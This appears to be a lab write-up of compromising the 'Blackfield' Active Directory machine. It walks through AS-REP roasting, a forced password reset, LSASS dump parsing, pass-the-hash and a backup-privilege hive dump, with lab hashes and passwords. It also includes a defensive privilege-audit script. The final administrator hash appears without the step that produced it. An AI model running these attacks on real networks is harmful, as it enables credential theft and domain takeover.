1. Reconnaissance
1.1. nmap
Confirmed that this is a Windows AD environment. No particularly suspicious ports were found.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# nmap -sC -sV 10.129.44.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-23 15:45 +04
Nmap scan report for 10.129.44.77
Host is up (0.19s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-23 18:45:53Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn?
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m59s
| smb2-time:
| date: 2025-12-23T18:46:05
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.21 seconds
1.2. Failed reconnaissance
Reconnaissance with smbmap fails with access denied, as shown below.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 0 authenticated session(s)
[!] Access denied on 10.129.44.77, no fun for you...
[*] Closed 1 connections
1.3. Checking shares with smbclient
Listed the shares. Among them, a profiles$ share could be seen.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient -N -L //10.129.44.77
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
1.4. Exploring the profiles$ share
Browsing this share reveals many folders whose names look like account names.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/profiles$
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
AChampken D 0 Wed Jun 3 20:47:11 2020
ACheretei D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
Looking inside, the folders contain nothing. Their only use seems to be harvesting user IDs.
smb: \> recurse ON
smb: \> ls
. D 0 Wed Jun 3 20:47:12 2020
.. D 0 Wed Jun 3 20:47:12 2020
AAlleni D 0 Wed Jun 3 20:47:11 2020
ABarteski D 0 Wed Jun 3 20:47:11 2020
ABekesz D 0 Wed Jun 3 20:47:11 2020
ABenzies D 0 Wed Jun 3 20:47:11 2020
ABiemiller D 0 Wed Jun 3 20:47:11 2020
[...SNIP...]
1.5. Creating the users file
Since there are far too many accounts, a command is needed to turn them into a users file in one go. So I mount the share at /mnt.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mount -t cifs //10.129.44.77/profiles$ /mnt
Password for root@//10.129.44.77/profiles$:
Then the contents are saved into the users.old file.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# mv users users.old; ls -1 /mnt/ > users
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# ls
user users users.old
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# cat users.old
AAlleni
ABarteski
ABekesz
ABenzies
ABiemiller
AChampken
ACheretei
[...SNIP...]
1.6. Checking for accounts whose ID and password match
Using nxc, first identify whether any account uses its username as its password. The AAlleni account was found to have matching ID and password.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u users.old -p users.old --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\AAlleni:AAlleni (Guest)
SMB 10.129.44.77 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIED
However, there is not much that can be done with this account.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# smbclient -L //10.129.44.77/ -U AAlleni%AAlleni
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
forensic Disk Forensic / Audit share.
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
profiles$ Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.44.77 failed (Error NT_STATUS_IO_TIMEOUT)
Unable to connect with SMB1 -- no workgroup available
1.7. Checking access with GetNPUsers
With only usernames, what can be done is limited, so check with GetNPUsers. The hash of the support account was returned.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# impacket-GetNPUsers 'BLACKFIELD.LOCAL/' -usersfile users.old -outputfile hash -dc-ip 10.129.44.77
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[...SNIP...]
Cracking the hash yielded the password #00^BlackKnight.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
[...SNIP...]
$krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a88337a1d278499bd271450a$fdae867559c60e8d7d5f6c84775a9dc2374ded18870f64bfd6d8dae2c26753137d041e698a029bcc63db045eda4a864a973f240788e4d9d6172cc09aba3d49353d319e4b46d03cfcadc657888a6ae157daa16c9bc4e37bef610904f131d45b7ad01fae2e895ece77a199ad4ded9d76a71a15eca28dca5795bc4820c4a3bcfbaffb00602cee258086738e81f4de3c9706b5966e07fb18d40c2ce52f1f819c8279e91330de5c10dc6c00a98b0eb8cdc76270e7377ca5136b3a739b2006624c0a8d0f8308f081b55128ee39d72fef1ecd6421297573ef4ce0cdc9700eee017fe593eb034091005602b4b7f5d9bb0264f7e5b0e95aca:#00^BlackKnight
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$support@BLACKFIELD.LOCAL:6534edc8a883...e95aca
Time.Started.....: Wed Dec 24 08:58:18 2025 (5 secs)
Time.Estimated...: Wed Dec 24 08:58:23 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 3216.6 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14336000/14344385 (99.94%)
Rejected.........: 0/14336000 (0.00%)
Restore.Point....: 14333952/14344385 (99.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: #1crapper -> #!hrvert
Hardware.Mon.#1..: Util: 84%
[...SNIP...]
Checked the shares over SMB, but nothing stood out.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc smb 10.129.44.77 -u support -p '#00^BlackKnight' --shares
SMB 10.129.44.77 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.129.44.77 445 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
SMB 10.129.44.77 445 DC01 [*] Enumerated shares
SMB 10.129.44.77 445 DC01 Share Permissions Remark
SMB 10.129.44.77 445 DC01 ----- ----------- ------
SMB 10.129.44.77 445 DC01 ADMIN$ Remote Admin
SMB 10.129.44.77 445 DC01 C$ Default share
SMB 10.129.44.77 445 DC01 forensic Forensic / Audit share.
SMB 10.129.44.77 445 DC01 IPC$ READ Remote IPC
SMB 10.129.44.77 445 DC01 NETLOGON READ Logon server share
SMB 10.129.44.77 445 DC01 profiles$ READ
SMB 10.129.44.77 445 DC01 SYSVOL READ Logon server share
2. Internal Network Penetration
2.1. Identifying a suspicious account
Querying LDAP with nxc shows that an account named audit2020 has a BadPW value of 3, i.e. three failed password attempts are recorded against it. This account looks suspicious.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# nxc ldap 10.129.44.77 -u support -p '#00^BlackKnight' --users
LDAP 10.129.44.77 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
LDAP 10.129.44.77 389 DC01 [+] BLACKFIELD.local\support:#00^BlackKnight
LDAP 10.129.44.77 389 DC01 [*] Enumerated 315 domain users: BLACKFIELD.local
LDAP 10.129.44.77 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.44.77 389 DC01 Administrator 2020-02-23 22:09:53 0 Built-in account for administering the computer/domain
LDAP 10.129.44.77 389 DC01 Guest 2020-06-03 20:18:28 0 Built-in account for guest access to the computer/domain
LDAP 10.129.44.77 389 DC01 krbtgt 2020-02-23 22:08:31 0 Key Distribution Center Service Account
LDAP 10.129.44.77 389 DC01 audit2020 2020-09-22 02:35:06 3
LDAP 10.129.44.77 389 DC01 support 2020-02-23 21:53:23 0
[...SNIP...]
2.2. Mapping internal relationships with BloodHound
Collect AD information with bloodhound-python.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# bloodhound-python -c ALL -u support -p '#00^BlackKnight' -d blackfield.local -dc dc01.blackfield.local -ns 10.129.44.77
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.blackfield.local:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 18 computers
INFO: Connecting to LDAP server: dc01.blackfield.local
[...SNIP...]
As noted earlier, the audit2020 account looked suspicious, and the account currently in hand, support, holds the ForceChangePassword right over it. In other words, the support account can forcibly change audit2020's password.

2.3. Changing the audit2020 password with rpcclient
The password can be changed with rpcclient's setuserinfo2 command. I don't know why the 23 option is used.
┌──(root㉿kali)-[/home/kali/labs/Blackfield/mnt]
└─# rpcclient -U "support"%"#00^BlackKnight" 10.129.44.77
rpcclient $> 10.129.44.77
command not found: 10.129.44.77
rpcclient $> setuserinfo2
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 audit2020 23 'test123!'
rpcclient $>
Using the audit2020 account with its changed password, check the shares with smbmap.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbmap -H 10.129.44.77 -u audit2020 -p 'test123!'
SMBMap - Samba Share Enumerator v1.10.7 | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 10.129.44.77:445 Name: 10.129.44.77 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
[*] Closed 1 connections
2.4. Collecting internal data from the shares
Having confirmed READ access to the forensic share, identify what data it holds. domain_admins.txt inside the commands_output folder catches the eye.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# smbclient //10.129.44.77/forensic -U audit2020%test123!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
5102079 blocks of size 4096. 1671250 blocks available
smb: \> recurse ON
smb: \> ls
. D 0 Sun Feb 23 17:03:16 2020
.. D 0 Sun Feb 23 17:03:16 2020
commands_output D 0 Sun Feb 23 22:14:37 2020
memory_analysis D 0 Fri May 29 00:28:33 2020
tools D 0 Sun Feb 23 17:39:08 2020
\commands_output
. D 0 Sun Feb 23 22:14:37 2020
.. D 0 Sun Feb 23 22:14:37 2020
domain_admins.txt A 528 Sun Feb 23 17:00:19 2020
domain_groups.txt A 962 Sun Feb 23 16:51:52 2020
domain_users.txt A 16454 Sat Feb 29 02:32:17 2020
firewall_rules.txt A 518202 Sun Feb 23 16:53:58 2020
ipconfig.txt A 1782 Sun Feb 23 16:50:28 2020
netstat.txt A 3842 Sun Feb 23 16:51:01 2020
route.txt A 3976 Sun Feb 23 16:53:01 2020
systeminfo.txt A 4550 Sun Feb 23 16:56:59 2020
tasklist.txt A 9990 Sun Feb 23 16:54:29 2020
[...SNIP...]
Looking at that file, there is something that looks like an Administrator credential, but it is not of much use.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cat domain_admins.txt
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator Ipwn3dYourCompany
The command completed successfully.
Another file, lsass.zip in the memory_analysis folder, could be collected. This is a full memory dump of LSASS, from which NTLM hashes and similar material can be obtained. Downloading it with smbclient kept breaking off because the file is too large, so I mounted the share and copied it instead.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# mount -t cifs //10.129.44.77/forensic /mnt/ -o user=audit2020,password='test123!'
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# cp /mnt/memory_analysis/lsass.zip /home/kali/labs/Blackfield/
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# unzip lsass.zip
Archive: lsass.zip
inflating: lsass.DMP
2.5. Analysing the lsass.DMP file
Analysing this file lets you extract NTLM hashes for various accounts.
┌──(root㉿kali)-[/home/kali/labs/Blackfield]
└─# pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef62100000000
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
== Kerberos ==
Username: svc_backup
Domain: BLACKFIELD.LOCAL
== WDIGEST [633ba]==
username svc_backup
domainname BLACKFIELD
password None
password (hex)
[...SNIP...]
After extracting the hash and logging in as svc_backup with it, I got a shell normally and confirmed that user.txt could be read.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> type C:\Users\svc_backup\Desktop\user.txt
Tried logging in as administrator, but confirmed that it does not work.
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
3. Privilege Escalation
3.1. Checking svc_backup's privileges
*Evil-WinRM* PS C:\Users\svc_backup\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
*Evil-WinRM* PS C:\Users\svc_backup\Documents> net user svc_backup
User name svc_backup
Full Name
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2020 9:54:48 AM
Password expires Never
Password changeable 2/24/2020 9:54:48 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/23/2020 10:03:50 AM
Logon hours allowed All
Local Group Memberships *Backup Operators *Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
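As an added example (not part of the original writeup): a Python script that parses the whoami /priv table and the group lines of net user shown above and reports the combination that makes svc_backup admin-equivalent. The SENSITIVE list and its reason strings are my own summary of well-known privilege abuse paths, not Microsoft's text, and the sample output is constructed from the session above.

```python
import re

# Constructed samples, copied from the svc_backup session above: the
# `whoami /priv` table and the group lines of `net user svc_backup`
# (net user truncates long group names, hence "Remote Management Use").
PRIV_OUTPUT = """\
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
"""
NET_USER_OUTPUT = """\
User name                    svc_backup
Local Group Memberships      *Backup Operators     *Remote Management Use
Global Group memberships     *Domain Users
"""

# Privileges that bypass object ACLs on their own; holding any of them is
# treated as local-admin equivalent. Reason strings are my wording.
SENSITIVE = {
    "SeBackupPrivilege": "read any file or registry hive regardless of ACL",
    "SeRestorePrivilege": "write any file or registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open any process, including LSASS",
    "SeImpersonatePrivilege": "impersonate other users' tokens",
    "SeAssignPrimaryTokenPrivilege": "assign a primary token to a process",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
}

PRIV_ROW = re.compile(r"^(Se\w+)\s+(.*?)\s+(Enabled|Disabled)\s*$")

def parse_privileges(text):
    """Map privilege name -> state ("Enabled"/"Disabled") from `whoami /priv`."""
    return {m.group(1): m.group(3)
            for m in map(PRIV_ROW.match, text.splitlines()) if m}

def parse_groups(text):
    """Collect the *-prefixed group names from the membership lines of `net user`."""
    groups = []
    for line in text.splitlines():
        if "Group" in line.split("*")[0]:
            groups += [g.strip() for g in line.split("*")[1:] if g.strip()]
    return groups

def audit(priv_text, net_user_text):
    """Report sensitive privileges held (enabled or not: a holder can enable a
    disabled privilege at will) and whether the account can also log on
    remotely, which turns a local finding into a domain-wide one."""
    privs = parse_privileges(priv_text)
    groups = parse_groups(net_user_text)
    findings = {n: SENSITIVE[n] for n in privs if n in SENSITIVE}
    remote = any(g.startswith("Remote Management Use") for g in groups)
    return {"sensitive": findings, "groups": groups, "remote_logon": remote,
            "admin_equivalent": bool(findings)}

if __name__ == "__main__":
    for key, value in audit(PRIV_OUTPUT, NET_USER_OUTPUT).items():
        print(f"{key}: {value}")
```

On the session above it reports SeBackupPrivilege and SeRestorePrivilege together with remote WinRM logon, which is exactly the pairing (Backup Operators plus Remote Management Users) that warrants a membership review on a domain controller.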
3.2. Attempting to access the administrator account with secretsdump
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download sam
Info: Downloading C:\Users\svc_backup\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents> download system
Info: Downloading C:\Users\svc_backup\Documents\system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc_backup\Documents>
It doesn't work.
┌──(root㉿kali)-[/home/kali]
└─# impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 67ef902eae0d740df6257f273de75051
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
┌──(root㉿kali)-[/home/kali]
└─# evil-winrm -i 10.129.44.77 -u administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt